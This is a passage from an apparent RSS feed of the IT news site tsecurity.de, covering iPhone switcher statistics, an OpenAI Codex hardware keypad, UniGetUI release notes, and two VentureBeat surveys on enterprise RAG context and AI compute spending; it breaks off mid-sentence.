<p class="wp-block-paragraph">Gartner says market consolidation continues to favor platform-oriented vendors that combine full-stack observability with integrated AI capabilities. Organizations are increasingly looking for unified platforms that can monitor applications, infrastructure, digital experiences, and AI workloads from a single environment.</p>



<h2 class="wp-block-heading">The rise of operational intelligence</h2>



<p class="wp-block-paragraph">As enterprises modernize applications and expand AI initiatives, organizations want platforms that can not only identify problems but also explain causes, prioritize actions, and potentially automate remediation. Vendors are expanding observability platforms with AI-driven analytics, automation, and governance capabilities that span applications, infrastructure, cloud services, and AI workloads.</p>



<p class="wp-block-paragraph">For enterprise buyers, the next phase of observability may be defined less by telemetry collection and more by how effectively vendors can transform data into intelligence, automation, and measurable business outcomes.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple Continues To See Steady Flow Of Android Switchers In 2026]]></title>
<description><![CDATA[Getting people to switch their phone setup remains a top goal for Apple. According to new research from Consumer Intelligence Research Partners, a solid chunk of buyers are still making the leap from rival devices. The firm looked closely at people who bought a new iPhone in the US during the fir...]]></description>
<link>https://tsecurity.de/de/3676124/ios-mac-os/apple-continues-to-see-steady-flow-of-android-switchers-in-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676124/ios-mac-os/apple-continues-to-see-steady-flow-of-android-switchers-in-2026/</guid>
<pubDate>Fri, 17 Jul 2026 15:06:49 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Getting people to switch their phone setup remains a top goal for Apple. According to new research from Consumer Intelligence Research Partners, a solid chunk of buyers are still making the leap from rival devices. The firm looked closely at people who bought a new iPhone in the US during the first few months of the year to see exactly what phone they used before upgrading.



Twelve percent of recent buyers moved from an Android device



During the March 2026 quarter, survey data showed that 12 percent of new smartphone purchases came directly from people who previously owned an Android device. The research group tracks this by asking buyers about their prior phone and operating system when they make a new purchase.



This current number falls right in line with recent historical trends. Over the past few years, the rate of users leaving devices powered by Google to join the iOS platform has mostly settled between 11 and 15 percent. The early days of mobile carrier expansion saw massive waves of people jumping ship, but the market has now reached a much more predictable rhythm.



While the massive spikes of platform switching are mostly in the past, pulling in more than one out of every ten new buyers from a rival company is a steady win. It shows that the platform still holds strong appeal for those looking to change their daily tech routine.]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenAI Is Selling $230 Codex Micro Hardware Product With Work Louder]]></title>
<description><![CDATA[OpenAI recently teamed up with Work Louder to release a physical tool for developers. Reports show OpenAI is selling $230 Codex Micro hardware product units on its website now. The keyboard brings your digital agent workspace straight to your desk. It helps users manage active chats and keep trac...]]></description>
<link>https://tsecurity.de/de/3675822/ios-mac-os/openai-is-selling-230-codex-micro-hardware-product-with-work-louder/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675822/ios-mac-os/openai-is-selling-230-codex-micro-hardware-product-with-work-louder/</guid>
<pubDate>Fri, 17 Jul 2026 12:53:59 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[OpenAI recently teamed up with Work Louder to release a physical tool for developers. Reports show OpenAI is selling $230 Codex Micro hardware product units on its website now. The keyboard brings your digital agent workspace straight to your desk. It helps users manage active chats and keep track of tasks through live lighting feedback. Buyers can pick between a clicky or silent switch version when ordering the device.



The device offers physical controls for common coding workflow tasks



The gadget maps your most used actions to physical buttons. This release shows its push into the physical world of artificial intelligence tools.



It connects directly with the desktop app to provide high customization. You can reassign any key or change how the agent buttons work to fit your specific needs. Each key lights up with a status indicator so you can see if the program is thinking, running, waiting, or done before you even open a chat window.



Here is a look at the specific features built into this product:




Trigger skills instantly: Users can flick the built-in joystick to launch common workflows. This includes reviewing a pull request, debugging a coding error, or refactoring text.



Keep core actions close: The command keys give you a dedicated shortcut for accepting, rejecting, or starting a new chat.



Set the brainpower: You can turn a physical dial to adjust the reasoning level of the AI on the fly. This lets you stay fast for simple tasks or turn it up for heavier thinking.




This hardware release marks a big shift in how developers interact with digital models. Moving software controls to a physical keypad saves time by reducing screen switching. It also makes working with smart agents feel much more natural and direct.



The release points to a future where physical devices bridge the gap between human input and complex background processing.]]></content:encoded>
</item>
<item>
<title><![CDATA[UniGetUI v2026.2.5]]></title>
<description><![CDATA[Devolutions UniGetUI 2026.2.5
This release introduces a new searchable Settings experience, making it easier to find configuration options. It also includes several  improvements and fixes.
Highlights

Added a comprehensive search feature to the Settings page, allowing you to quickly find and nav...]]></description>
<link>https://tsecurity.de/de/3674421/downloads/unigetui-v202625/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3674421/downloads/unigetui-v202625/</guid>
<pubDate>Thu, 16 Jul 2026 20:46:23 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h1>Devolutions UniGetUI 2026.2.5</h1>
<p>This release introduces a new searchable Settings experience, making it easier to find configuration options. It also includes several  improvements and fixes.</p>
<h3>Highlights</h3>
<ul>
<li>Added a comprehensive search feature to the <strong>Settings</strong> page, allowing you to quickly find and navigate to configuration options.</li>
<li>Added a configurable <strong>skip level</strong> for minor updates, giving you more control over which updates are offered.</li>
</ul>
<h3>Improvements</h3>
<ul>
<li>Improved the update notification experience by preventing the application from automatically switching to the <strong>Updates</strong> page when displaying a toast notification.</li>
</ul>
<h3>Bug Fixes</h3>
<ul>
<li>Fixed installation scope handling for PowerShell 7.x modules.</li>
<li>Fixed sorting of the <strong>Installed Packages</strong> list under NativeAOT builds.</li>
</ul>
<p>Thank you to everyone who reported issues and contributed improvements to the project.</p>
<p><strong>Full Changelog:</strong> <a class="commit-link" href="https://github.com/Devolutions/UniGetUI/compare/v2026.2.4...v2026.2.5"><tt>v2026.2.4...v2026.2.5</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The AI context gap: Enterprise AI organizations have a trust problem, not a retrieval problem — and most are still building the fix]]></title>
<description><![CDATA[Across 101 enterprises, the infrastructure that feeds AI agents their business context is being built faster than it can be trusted. Retrieval-augmented generation is already the default context source, and provider-native retrieval has quietly overtaken the dedicated vector databases that define...]]></description>
<link>https://tsecurity.de/de/3674340/it-nachrichten/the-ai-context-gap-enterprise-ai-organizations-have-a-trust-problem-not-a-retrieval-problem-and-most-are-still-building-the-fix/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3674340/it-nachrichten/the-ai-context-gap-enterprise-ai-organizations-have-a-trust-problem-not-a-retrieval-problem-and-most-are-still-building-the-fix/</guid>
<pubDate>Thu, 16 Jul 2026 20:02:44 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Across 101 enterprises, the infrastructure that feeds AI agents their business context is being built faster than it can be trusted. Retrieval-augmented generation is already the default context source, and provider-native retrieval has quietly overtaken the dedicated vector databases that define the category — yet a majority of enterprises have already watched their agents produce confident, wrong answers traced to missing or inconsistent context. A governed semantic layer is emerging as the fix, but most are still building it; the field is converging on hybrid retrieval; and even as provider-native tools lead in practice, a plurality say they intend to keep best-of-breed. The result is a context gap — agents that sound authoritative running on a foundation their owners do not yet fully trust.</p><p>This wave of VentureBeat Pulse Research examines the enterprise RAG and context layer: what feeds AI agents their business context, which retrieval systems enterprises run, how they buy and measure them, where the architecture is heading, and — most revealingly — how often that context is already failing them.</p><p>The central finding is a context gap — the distance between how confidently enterprise agents answer and how reliable the context beneath them actually is. A majority of enterprises (57%) report that in the past six months their AI agents produced confident but wrong answers they traced to missing or inconsistent business context, and more than half of those said it happened more than once. This is not a fringe failure: retrieval is the primary context source for 38% of enterprises, more than any other approach, so when retrieval is thin or inconsistent, the errors it produces are wearing the agent’s authority. The infrastructure to fix it is being built — 58% already run or are building a governed semantic layer — but for most it is not yet in production.</p><p>Underneath, the market is consolidating in a direction that surprises. Provider-native retrieval — OpenAI’s file search (40%) and Google’s Vertex AI Search (38%) — already leads every dedicated vector database, and enterprises expect hybrid retrieval to dominate by the end of 2026 (34%). Yet a plurality (36%) say they intend to keep best-of-breed standalone tools rather than consolidate onto a provider’s native context stack, and a majority (57%) plan to switch or add a provider within the year. Stated preference and actual usage are pulling in opposite directions — the market is buying provider-native while insisting it wants independence.</p><h2>Methodology</h2><p>VentureBeat fielded this survey as part of its ongoing Pulse Research series. This survey focused on enterprise RAG infrastructure and the context layer — the retrieval systems, semantic layers, and context sources that feed AI agents. Responses are filtered to organizations with more than 100 employees (n=101); the survey drew no responses from organizations of 100 or fewer, so the full sample qualifies. All responses are from a single Q2 2026 (June) wave, so the report reads cross-sectionally and does not infer month-over-month trends. Several questions were multiple-select, so those shares can sum to more than 100%.</p><p>By organization size the sample concentrates in the mid-market: 251–1,000 employees (31%) and 101–250 (31%) lead, with 1,001–5,000 (20%), 5,001–10,000 (12%), and 10,001+ (7%) above them. By role it spans managers (39%), individual contributors (27%), the C-suite (16%), and VPs and directors (14%); on purchasing authority it is buyer-credible, with 46% final decision-makers and another 26% recommenders or influencers. Technology/Software is the largest industry at 20%, followed by Healthcare/Life Sciences (11%) and a broad spread across retail, transportation, financial services, manufacturing, and education.</p><p>At 101 respondents this is a modest sample and should be read as a directional signal rather than a precise measurement; it is self-selected and is not a probability sample. It is best read as the view from organizations actively standing up RAG and context infrastructure rather than from the largest operators.</p><h2>Finding 1: Confident and wrong</h2><p><b>More than half have traced agent errors to bad context</b></p><p>We asked whether, in the past six months, enterprises had traced a confident but wrong agent answer to missing or inconsistent business context. Most had.</p><div></div><p>This is the report’s defining number. A majority of enterprises (57%) have already had an AI agent produce a confident, wrong answer they traced to bad context — wrong metrics, stale definitions, or missing documents — and more than half of those have seen it happen more than once. Only 28% report no such failure, and a small remainder either don’t run agents on enterprise data or don’t trace root cause closely enough to know. </p><p>The failure mode is specific and dangerous: the model is not obviously hallucinating; it is confidently wrong because the context feeding it was thin or inconsistent. Everything else in this report — what enterprises retrieve, how they govern it, and what they plan to build — is downstream of this problem.</p><h2>Finding 2: RAG is the default context source</h2><p><b>Retrieval feeds more agents than any other method</b></p><p>We asked what an enterprise’s AI agents primarily use to understand its data. Retrieval leads by a wide margin.</p><div></div><p>Retrieval is the backbone of enterprise context. For 38% of organizations, RAG over documents or a vector index is the primary way agents understand the business — nearly twice the share of the next approach, a governed semantic layer or ontology (21%). Mixed approaches (14%), direct live-system queries (10%), and long-context loading (6%) fill out the rest, and only 2% let agents run on the model’s general knowledge alone. The concentration matters in light of Finding 1: because so much enterprise context flows through retrieval, the quality of that retrieval is the quality of the answer. When RAG is the default source, thin retrieval is not an edge case — it is the main failure surface.</p><p>One approach is notable for its absence from these answers: customizing model weights, also known as fine-tuning. Every leading source of business context is injected at run time. Our most recent direct measurement of fine-tuning comes from our April–May survey wave (a separate survey, n=136), where fine-tuning capabilities ranked last of six factors in model selection at 5% — even as 26% of that sample still named fine-tuning and customization an investment they expect to grow. Fine-tuning has fallen out of the primary selection conversation; context injection is how enterprises make agents knowledgeable about their business.</p><h2>Finding 3: Provider-native retrieval already leads the vector databases</h2><p><b>OpenAI file search and vertex AI search top the dedicated tools</b></p><p>We asked which retrieval systems enterprises run in production today. The answer favors the model providers and hyperscalers over the specialists.</p><div></div><p>The dedicated vector database is no longer the center of the RAG stack. OpenAI’s file search (40%) and Google’s Vertex AI Search (38%) lead — provider-native and hyperscaler-native retrieval — ahead of every purpose-built vector database. Among the specialists, the most-used is the one enterprises already run for other reasons (Elasticsearch/OpenSearch, 20%) and the open, embedded option (pgvector, 12%); the pure-play vector databases that define the category — Weaviate, Qdrant, Pinecone, Milvus — each sit in single digits to low double digits. Notably, 13% of enterprises say they still run no production RAG at all. As with the platforms in the parallel infrastructure wave, enterprises are gravitating to retrieval that comes bundled with tools they already buy.</p><p>The shape of this finding held across both Q2 waves. In April–May (n=161), provider-built retrieval led usage there too, while every dedicated vector database remained marginal — the most-used standalone vector database peaked at 8% of that sample — and the hybrid, pluralistic future was already the consensus expectation (34% expected hybrid retrieval to dominate, with another 29% expecting multiple architectures by use case). Two waves, consistent picture: the category that coined the “vector database” term is being collected by the platforms enterprises already buy from.</p><h2>Finding 4: But they say they want to keep best-of-breed</h2><p><b>A plurality resist consolidating onto a provider’s native stack</b></p><p>We asked how enterprises will respond as model providers bundle retrieval, memory, and orchestration into their platforms. Their stated intent cuts against their current usage.</p><div></div><p>Here is the tension at the heart of the stack. Even as provider-native retrieval leads in practice (Finding 3), a plurality of enterprises (36%) say they intend to keep best-of-breed standalone tools rather than consolidate onto a provider’s native context stack — well ahead of the 21% who plan to consolidate. Another 21% expect a mix, and 9% intend to build and own the layer themselves. The gap between what enterprises run and what they say they want is the strategic question of the category: they are adopting bundled retrieval for convenience while asserting they will preserve independence. Which impulse wins — the pull of the provider bundle or the stated preference for modular control — will shape the retrieval market more than any single tool.</p><h2>Finding 5: Hybrid retrieval is the consensus bet</h2><p><b>Vector-only retrieval is already seen as insufficient</b></p><p>We asked which retrieval architecture enterprises expect to dominate their production RAG systems by the end of 2026. The field is converging — with a large share still unsure.</p><div></div><p>The architecture is settling on hybrid. A third (34%) expect hybrid retrieval — embeddings combined with reranking and access controls — to dominate their production systems by the end of 2026, three times the 11% who expect vector-only retrieval to prevail. That is a notable signal: the pure vector-search approach that launched the category is already viewed as insufficient on its own, superseded by pipelines that add reranking for accuracy and access controls for governance — the very access controls whose absence produces the failures in Finding 1. Tellingly, the second-largest answer is uncertainty: 17% simply don’t know, and another 14% expect to move beyond a dedicated vector layer entirely toward tool-first or long-context retrieval. The consensus is not a single tool but a layered pipeline — and it is not yet fully formed.</p><h2>Finding 6: The governed context layer is being built now</h2><p><b>Most run or are building a semantic layer — few in production</b></p><p>We asked whether enterprises use a governed semantic or context layer to give agents and BI a shared understanding of their data. Most are on the path; fewer have arrived.</p><div></div><p>The fix for the context gap is under construction. Well over half of enterprises (58%) either run a governed semantic layer in production (25%) or are piloting and building one (34%), and a further 17% are actively evaluating — meaning three-quarters are engaged with the idea in some form. But the balance is telling: more are building than have shipped, so for most enterprises the shared, governed definition layer that would prevent the "confident but wrong" failures of Finding 1 is still a work in progress. The semantic layer is the industry’s answer to inconsistent context; this wave catches it mid-construction, ambition well ahead of production.</p><h2>Finding 7: Bought on ingestion and simplicity, watched for correctness</h2><p><b>Selection favors operability; monitoring favors correctness and security</b></p><p>We asked what matters most when enterprises choose a retrieval system, and what they track once it is running. Both answers lean practical.</p><div></div><p>Enterprises choose retrieval systems on operability. Ease of data ingestion (36%), latency and performance (32%), and operational simplicity (29%) lead the selection criteria — ahead of retrieval accuracy and access control (23% each), the two factors most directly tied to the failures in Finding 1. Once systems are running, the emphasis shifts toward trust: the most-tracked metrics are response correctness (42%) and security and access control (38%), ahead of latency (28%), operational stability (27%), and answer relevance (23%). </p><p>Satisfaction with current systems is moderately positive but not enthusiastic — on a five-point scale, overall satisfaction averages 4.0, with ease of implementation and value for money both near 3.9. Enterprises buy for how easily a system runs and watch it for whether it can be trusted.</p><h2>Finding 8: A retrieval reshuffle is coming</h2><p><b>A majority plan to change providers — and the vector specialists are gaining interest</b></p><p>We asked whether enterprises plan to change or add a retrieval provider, and which they are considering. The consideration set differs from today’s stack.</p><div></div><p>The retrieval stack is not settled. While 43% have no plans to change, a small majority (57%) intend to switch or add a provider within twelve months, and a quarter (26%) within the next quarter. The consideration set is where it gets interesting: provider-native retrieval still leads what enterprises are evaluating (OpenAI 22%, Vertex AI Search 21%), but the open-source vector specialists punch above their current footprint — Qdrant (14%) and Milvus (13%) draw more switching interest than their present usage (10% and 6%) would suggest. Read with Finding 4, the picture is a market in flux: enterprises run provider-native today, are evaluating a broader field, and say they want to keep their options open. The reshuffle ahead will test whether best-of-breed intent survives contact with the convenience of the bundle.</p><h1>The bottom line: A context gap that more retrieval alone won’t close</h1><p>Organizations with more than 100 employees are wiring agents into their business faster than they can guarantee the context those agents run on. Retrieval is the default source of enterprise context, and it increasingly comes from the model providers and hyperscalers rather than the dedicated vector databases — yet a majority of enterprises have already watched agents answer confidently and wrongly because that context was thin or inconsistent. The failure is not exotic; it is the predictable result of pointing authoritative-sounding agents at an unreliable foundation.</p><p>The industry’s answer — a governed semantic layer, hybrid retrieval with reranking and access controls — is being built but is mostly not yet in production, and enterprises are pulled between the convenience of provider-native bundles and a stated preference for best-of-breed independence. At 101 respondents in a single Q2 wave this is a directional read, skewed toward the mid-market — but the direction is clear: the context layer is the next contested tier of the AI stack, and right now agents are running ahead of it. The context gap is not a retrieval-volume problem that more documents or bigger indexes will solve on their own; it is a problem of governed, consistent, access-aware context. The open question for later waves is whether enterprises finish building that layer before the confident-but-wrong failures move from the lab into decisions that matter.</p><hr><p><i>Based on survey responses from 101 qualified enterprise respondents (100+ employees), drawn from a single Q2 2026 (June) wave. At this sample size the results should be read as a directional signal rather than a precise measurement — it's a self-selected sample, not a probability sample, and skews toward the mid-market. Respondents include managers, individual contributors, VPs/directors, and the C-suite, with strong purchasing authority, across technology, healthcare, retail, transportation, financial services, manufacturing, and education.</i></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The AI compute gap: Enterprises are buying infrastructure faster than they can measure what it costs]]></title>
<description><![CDATA[Across 107 enterprises, AI infrastructure spending is accelerating well ahead of the ability to see or steer its economics. Most organizations run their AI on a familiar base of hyperscalers and model-provider APIs, yet the next dollar is aimed at specialized compute almost none of them use today...]]></description>
<link>https://tsecurity.de/de/3674337/it-nachrichten/the-ai-compute-gap-enterprises-are-buying-infrastructure-faster-than-they-can-measure-what-it-costs/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3674337/it-nachrichten/the-ai-compute-gap-enterprises-are-buying-infrastructure-faster-than-they-can-measure-what-it-costs/</guid>
<pubDate>Thu, 16 Jul 2026 20:02:38 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Across 107 enterprises, AI infrastructure spending is accelerating well ahead of the ability to see or steer its economics. Most organizations run their AI on a familiar base of hyperscalers and model-provider APIs, yet the next dollar is aimed at specialized compute almost none of them use today; a majority intend to switch or add providers within the year, many within a quarter. Buying decisions turn on integration and total cost of ownership rather than headline token price — which is fortunate, because most enterprises cannot yet see their unit economics clearly: GPUs sit at half utilization or less, and fewer than half rigorously track what their compute actually costs. The result is a compute gap — heavy, fast-moving investment running ahead of the visibility needed to control it.</p><p>This wave of VentureBeat Pulse Research examines enterprise AI infrastructure and compute: where organizations are in their deployment journey, what they run AI on today, how satisfied they are, what would make them switch, where they plan to evaluate their investments, and — most revealingly — how well they can measure and control the economics of the compute underneath it all.</p><p>The central finding is a compute gap — the distance between how aggressively enterprises are investing in AI infrastructure and how little of its economics they can see. Only about one in five (21%) run AI in production at scale, yet spending intentions are outrunning that maturity: the single largest planned area enterprises plan to evaluate over the next year is AI-specialized clouds (45%), a layer almost none of these enterprises use today. Meanwhile the compute already in place runs cold — 83% report GPU utilization of 50% or less — and fewer than half (44%) can rigorously track what their AI compute costs. Enterprises are buying more infrastructure faster than they can account for what they already own.</p><p>Enterprises are not settled on their infrastructure vendors, either: A clear majority (64%) plan to switch or add an infrastructure provider within twelve months, and 38% within the next quarter — unusually high churn intent for a category this foundational. When they choose, they choose on integration with the existing stack (41%) and total cost of ownership (35%), not on headline price: cost per million tokens is the deciding factor for just 8%. And the frontier constraint that will shape the next round of decisions — the shift from GPU compute to memory bandwidth as inference scales — is barely on the radar, with roughly one in five enterprises either unaware of it or yet to address it.</p><h2>Methodology</h2><p>VentureBeat fielded this survey as part of its ongoing Pulse Research series, this survey focused on enterprise AI infrastructure, compute, and inference economics. Responses are filtered to organizations with more than 100 employees (n=107; the survey’s smallest size band, 1–100 employees, is excluded), drawn from a single Q2 2026 (June) wave. Because this is one wave rather than a pooled multi-month sample, the report reads cross-sectionally and does not infer month-over-month trends. Several questions were multiple-select, so those shares can sum to more than 100%.</p><p>By organization size the sample concentrates in the mid-market: 101–250 employees (36%) and 251–1,000 (27%) lead, with 1,001–5,000 (22%), 5,001–10,000 (8%), and 10,001+ (7%) above them. By role it spans managers (38%), individual contributors (28%), VPs and directors (19%), and the C-suite (13%); on purchasing authority it is buyer-credible, with 45% final decision-makers and another 30% recommenders or influencers for AI solutions. Technology/Software is the largest industry at 26%, followed by Healthcare/Life Sciences (15%), Financial Services (13%), and Retail/E-commerce (12%).</p><p>At 107 respondents the sample is large enough to read directionally but should be treated as a directional signal rather than a precise measurement; it is self-selected and is not a probability sample. It also skews toward the mid-market and toward earlier-stage adopters, so it is best read as the view from organizations actively building out AI infrastructure rather than from the largest hyperscale operators.</p><h2>Finding 1: Ambition outpaces production</h2><p><b>Only one in five run AI in production at scale</b></p><p>We asked where organizations sit in their AI deployment journey. Most are still building toward production rather than operating at scale.</p><div></div><table><tbody><tr><td><p><b>38%</b></p></td><td><p><b>are experimenting — running proofs of concept, not yet in production</b></p></td></tr><tr><td><p><b>37%</b></p></td><td><p><b>have some workloads in production, but not across the organization</b></p></td></tr><tr><td><p><b>21%</b></p></td><td><p><b>run AI in production at scale — the mature minority</b></p></td></tr><tr><td><p><b>4%</b></p></td><td><p><b>are not yet running AI workloads at all</b></p></td></tr></tbody></table><p>The maturity curve is front-loaded. Three-quarters of enterprises (76%) are either experimenting or running only some workloads in production, and just 21% describe AI in production at scale. This matters for everything that follows: the infrastructure decisions in this report are being made largely by organizations still early in deployment, whose compute footprint — and whose costs — are about to grow. The evaluation and switching intentions in Findings 3 and 4 are the leading edge of that build-out, not the settled preferences of operators who have already found what works.</p><h2>Finding 2: Enterprises run on hyperscalers and model APIs</h2><p><b>The specialized GPU clouds barely register — today</b></p><p>We asked which providers and platforms enterprises currently use to run their AI. The answer is a familiar one: the incumbents.</p><div></div><table><tbody><tr><td><p><b>48%</b></p></td><td><p><b>use Google Cloud — the most-used platform overall (Microsoft Azure 29%, AWS 22%, Oracle Cloud 22%)</b></p></td></tr><tr><td><p><b>41%</b></p></td><td><p><b>use Google’s Gemini models, with OpenAI close behind at 40% and Anthropic at 12%</b></p></td></tr><tr><td><p><b>6%</b></p></td><td><p><b>run their own on-prem or co-located GPU clusters; 4% a custom open-source self-managed stack</b></p></td></tr><tr><td><p><b>&lt;2%</b></p></td><td><p><b>each use the specialized AI clouds — CoreWeave, Lambda, Crusoe, Nebius, Together, Fireworks and peers</b></p></td></tr></tbody></table><p>The current stack is hyperscaler-and-API. Google Cloud leads at 48%, and the general-purpose clouds (Google, Microsoft, AWS, Oracle) together with the major model APIs (Gemini, OpenAI, Anthropic) account for essentially all current deployment. The specialized “neocloud” GPU providers that dominate AI-infrastructure headlines — CoreWeave, Lambda, Crusoe, Nebius and peers — register at or near zero among these enterprises today. Only 6% run their own on-prem GPU clusters and 4% a custom open-source stack. Enterprises are, for now, running AI on the providers they already buy from — which makes the evaluation intentions in Finding 3 all the more striking.</p><p><i>(A note on reading these shares. As described in the methodology section, this sample is self-selected and skews mid-market, and this question counted every provider a respondent uses — an average of 2.1 selections each — so the figures measure presence in the stack rather than spending or primary status. A sample built this way will show a different provider mix than a spend-weighted census of the broader market; Google's strength here, for example, is consistent with its long-standing position among smaller enterprises building on AI. Read these shares as a portrait of what this AI-active cohort runs today, and treat gaps between these figures and industry-wide market share estimates as a property of the sample rather than a contradiction of either.)</i></p><h2>Finding 3: The next dollar goes to infrastructure they don’t yet run</h2><p><b>AI-specialized clouds top the evaluations list</b></p><p>We asked where enterprises planned to evaluate AI infrastructure over the next 12 months. Their answers point away from the stack they run today.</p><div></div><table><tbody><tr><td><p><b>45%</b></p></td><td><p><b>AI-specialized clouds (CoreWeave, Lambda, Crusoe, Nebius) — the top planned evaluation area</b></p></td></tr><tr><td><p><b>32%</b></p></td><td><p><b>non-NVIDIA accelerators (AWS Trainium, Google TPU, AMD Instinct, Intel Gaudi, in-house ASICs)</b></p></td></tr><tr><td><p><b>28%</b></p></td><td><p><b>Nvidia Blackwell (GB300) / next-generation GPUs</b></p></td></tr><tr><td><p><b>16%</b></p></td><td><p><b>decentralized or distributed compute networks</b></p></td></tr><tr><td><p><b>11%</b></p></td><td><p><b>sovereign or region-specific compute; 9% say none of the above</b></p></td></tr></tbody></table><p>Here is the report’s sharpest tension. The single most-cited planned evaluation area — AI-specialized clouds, at 45% — is the very category almost none of these enterprises use today (Finding 2). Nearly a third (32%) intend to evaluate non-Nvidia accelerators, and 28% in next-generation Nvidia silicon; even decentralized compute networks (16%) and sovereign compute (11%) draw meaningful interest. Read against current usage, this is not incremental — it is the leading edge of a re-platforming. The direction-of-travel question tells the same story: every infrastructure approach is net-expanding, but specialized AI clouds carry the highest net momentum (+24), edging out even the hyperscalers (+22). Enterprises are preparing to move a meaningful share of AI compute off the general-purpose cloud.</p><p>This continues a trend we saw in our April-May survey wave. Back then, usage of the AI-specialized clouds was equally marginal — CoreWeave at 3%, Lambda at 4%, Crusoe at 2% of enterprises. When we asked enterprises what change they planned in their AI infrastructure strategy over the next twelve months, the most-cited answer was moving workloads to specialized AI clouds, at 33%. Asked in April-May which emerging compute option they were most likely to evaluate AI-specialized clouds again drew the most responses. Two waves, two differently worded questions, one consistent picture: the type of cloud enterprises are most eager to assess is the type they have barely begun to use.</p><h2>Finding 4: A switching wave is building</h2><p><b>Six in 10 plan to change providers within a year — many within a quarter</b></p><p>We asked whether and when enterprises plan to switch or add an infrastructure provider. Very few intend to stand still.</p><div></div><table><tbody><tr><td><p><b>38%</b></p></td><td><p><b>plan to change within the next 0–3 months — tied for the most common answer</b></p></td></tr><tr><td><p><b>36%</b></p></td><td><p><b>have no plans to change</b></p></td></tr><tr><td><p><b>22%</b></p></td><td><p><b>plan to change within 3–6 months</b></p></td></tr><tr><td><p><b>7%</b></p></td><td><p><b>plan to change within 6–12 months</b></p></td></tr></tbody></table><p>For a category as foundational as compute, this is a remarkable amount of intended movement. Only 36% have no plans to change, meaning a clear majority (64%) intend to switch or add a provider within twelve months — and 38% within the next quarter alone. Where that interest points is telling: the providers drawing the most switching consideration are again the incumbents — Microsoft Azure and Google Cloud (33% each), OpenAI (30%), and Gemini (22%) — which suggests much of the near-term movement is reshuffling among the majors and consolidating spend rather than defecting to new entrants. The neocloud interest in Finding 3 is a 12-month evaluation thesis; the switching in the next quarter is mostly incumbents trading share.</p><p>(<i>Method note: Respondents who selected both "no plans to change" and a specific switching window are counted as switchers, on the logic that naming a timeframe is the more specific answer; three respondents were reclassified under this rule.</i>)</p><h2>Finding 5: Nobody buys on token price</h2><p><b>Integration and total cost of ownership decide — not sticker price</b></p><p>We asked what matters most when enterprises select an AI infrastructure provider. Headline price finished last.</p><div></div><table><tbody><tr><td><p><b>41%</b></p></td><td><p><b>integration with the existing cloud and data stack — the top factor</b></p></td></tr><tr><td><p><b>35%</b></p></td><td><p><b>total cost of ownership (TCO)</b></p></td></tr><tr><td><p><b>24%</b></p></td><td><p><b>performance — latency and throughput</b></p></td></tr><tr><td><p><b>19%</b></p></td><td><p><b>each cite security/compliance, autoscaling for spiky workloads, and GPU access/availability</b></p></td></tr><tr><td><p><b>8%</b></p></td><td><p><b>cost per 1M tokens — the least-cited factor</b></p></td></tr></tbody></table><p>Enterprises do not buy AI infrastructure on pricing, which is the place vendors compete on hardest. Integration with the existing stack (41%) and total cost of ownership (35%) dominate, while the headline metric — cost per million tokens — is the deciding factor for just 8%, dead last. The pattern is coherent: buyers are optimizing for how a provider fits and what it truly costs to operate, not for the advertised unit rate. It also foreshadows Finding 7 — enterprises say TCO matters most, yet most cannot yet measure it rigorously. The stated priority and the measured capability are out of step.</p><h2>Finding 6: Expensive GPUs, idle most of the time</h2><p><b>83% report GPU utilization of 50% or less</b></p><p>We asked what share of their GPU capacity enterprises actually utilize. The answer is a well-known but rarely quantified inefficiency.</p><div></div><table><tbody><tr><td><p><b>37%</b></p></td><td><p><b>run at 26–50% utilization</b></p></td></tr><tr><td><p><b>34%</b></p></td><td><p><b>run at 10–25% utilization</b></p></td></tr><tr><td><p><b>15%</b></p></td><td><p><b>run under 10% utilization</b></p></td></tr><tr><td><p><b>12%</b></p></td><td><p><b>run over 50% — the efficient minority</b></p></td></tr><tr><td><p><b>8%</b></p></td><td><p><b>don’t measure utilization at all; a further 7% consume via API and run no GPUs of their own</b></p></td></tr></tbody></table><p><i>Disclosure: Band percentages count every selection against all 107 qualified respondents; 14 respondents selected more than one band, so bands overlap. At the respondent level, 83 of the 100 GPU-operating enterprises reported utilization at or below 50%</i></p><p>The compute already in place runs cold. Adding the bands at or below half capacity, 83% of enterprises that operate GPUs report utilization of 50% or less, and nearly half (49%) run at 25% or below. Only 12% clear the 50% mark, and a further 8% do not measure utilization at all. Idle accelerators are expensive accelerators, and this is the clearest single measure of the compute gap: enterprises are planning to buy more GPUs and specialized compute (Finding 3) while the capacity they already own sits substantially unused. The efficiency headroom in the current fleet is large — and largely unmeasured.</p><h2>Finding 7: Spending fast, measuring slowly</h2><p><b>Fewer than half rigorously track what their compute costs</b></p><p>We asked whether enterprises can quantify the cost and return of their AI infrastructure spend, and how satisfied they are with what they run. Confidence in the ledger lags the spending.</p><div></div><table><tbody><tr><td><p><b>44%</b></p></td><td><p><b>track compute cost and ROI rigorously</b></p></td></tr><tr><td><p><b>39%</b></p></td><td><p><b>track it only partially</b></p></td></tr><tr><td><p><b>20%</b></p></td><td><p><b>can’t quantify it yet</b></p></td></tr><tr><td><p><b>6%</b></p></td><td><p><b>say it isn’t a priority</b></p></td></tr></tbody></table><p>Measurement trails money. Fewer than half of enterprises (44%) rigorously track the cost and return of their AI compute; the majority track only partially (39%), cannot quantify it yet (20%), or have not prioritized it (6%). That gap is consequential given Finding 5, where total cost of ownership was the second-ranked buying criterion — enterprises are choosing providers on an economic basis they mostly cannot yet measure. Satisfaction with current infrastructure is moderately positive but not enthusiastic: on a 